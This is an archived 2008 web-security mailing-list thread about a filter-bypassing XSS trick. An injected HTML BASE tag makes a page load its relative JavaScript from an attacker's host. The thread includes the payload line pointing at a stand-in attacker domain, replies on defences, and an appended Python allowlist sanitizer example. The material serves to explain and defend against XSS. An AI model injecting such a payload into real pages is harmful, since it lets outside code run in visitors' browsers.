RE: [WEB SECURITY] Nice little XSS trick
- From: "White, Dain P" <dainw@xxxxxxx>
- Subject: RE: [WEB SECURITY] Nice little XSS trick
- Date: Tue, 15 Jul 2008 13:34:46 -0700
In a real world example, I develop websites with content management systems that have WYSIWYG editors. Sure, these management systems are protected by some bombproof mechanism that keeps the bad guys from accessing the WYSIWYG editors, but my clients, the authorized users, are still not above copying and pasting content from other sites.
So, stripping out all HTML is not acceptable - can't work in this situation. I need to be able to provide my clients with the ability to copy and paste content from Word or wherever and still protect them from inadvertently doing Bad Things.
Normally (for me) this involves a whitelist of accepted tags, and a blacklist that scours the content for Bad Things, via regex. In my particular case, this XSS wouldn't work, because the vector isn't in my whitelist and would be removed - but not everyone uses this sort of hybrid "greylist" approach - they rely on a blacklist that is looking for "script" - and in that case, this sort of attack is certainly a Bad Thing.
Great job Amit.
~Dain
-----Original Message-----
From: Gabriel Kälin [mailto:Gabriel.Kaelin@xxxxxxxxxxx]
Sent: Tuesday, July 15, 2008 10:42 AM
To: Web Security
Subject: RE: [WEB SECURITY] Nice little XSS trick
Amit,
that's indeed an interesting attack because you use scriptless HTML semantics to first "kidnap" the client and then execute XSS. Yet, simple anti-XSS measures like proper output encoding of user content should thwart the attack. Bad enough in general if you can inject whole HTML tags! ;)
Gabe
> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
> Sent: Tuesday, July 15, 2008 1:34 PM
> To: Web Security
> Subject: [WEB SECURITY] Nice little XSS trick
>
> Hi list
>
> Recently I've been thinking about bypassing anti-XSS filters, and a nice little trick occurred to me, which I haven't seen anywhere (e.g. it's not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASE, but not the trick I describe here). The idea is to use the HTML BASE tag to force loading of JS code from the attacker's host. Consider a page with XSS vulnerability such as:
>
> <html>
> ...
> ***XSS code may be embedded here***
> ...
> <script src="/foo/bar.js"></script>
> ...
> </html>
>
> Now, an attacker can inject <base href="http://www.attacker.tld/">, and next thing you know, the browser (IE, at least) loads the JS from http://www.attacker.tld/foo/bar.js... And the beauty is that there's no "explicit" JS code involved in the payload itself.
>
> Note that according to the HTML standard, BASE should be placed in the HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is indeed observed by FF 2, but not by IE (checked IE6).
>
> Thanks,
> -Amit
>
>
> --------------------------------------------------------------
> --------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>
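The contrast Dain draws between a "script"-hunting blacklist and a tag allowlist, as an added example that is not part of any message in this thread: a small allowlist sanitizer built on Python's html.parser beside a naive blacklist regex, run over a constructed payload modelled on Amit's <base> injection. The tag and attribute sets, the function names and the payload are all assumptions chosen for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allowlist ("greylist") sanitizer: only these tags and attributes survive.
# Anything else, <base> and <script> included, is dropped on sight.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "ul", "ol", "li", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}   # assumed policy: links keep href only


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                     # unknown tag: removed, never re-emitted
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-encoded, so it cannot open a tag


def sanitize_allowlist(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Naive blacklist that only looks for "script" tags, the kind of filter
# Amit's trick walks straight past.
SCRIPT_RE = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def sanitize_blacklist(html):
    return SCRIPT_RE.sub("", html)


# Constructed payload: no script tag at all, just a <base> that re-roots
# every relative src on the page to the attacker's host.
PAYLOAD = '<p>Hello</p><base href="http://www.attacker.tld/">'
```

Running `sanitize_blacklist(PAYLOAD)` returns the payload untouched, while `sanitize_allowlist(PAYLOAD)` returns only `<p>Hello</p>`.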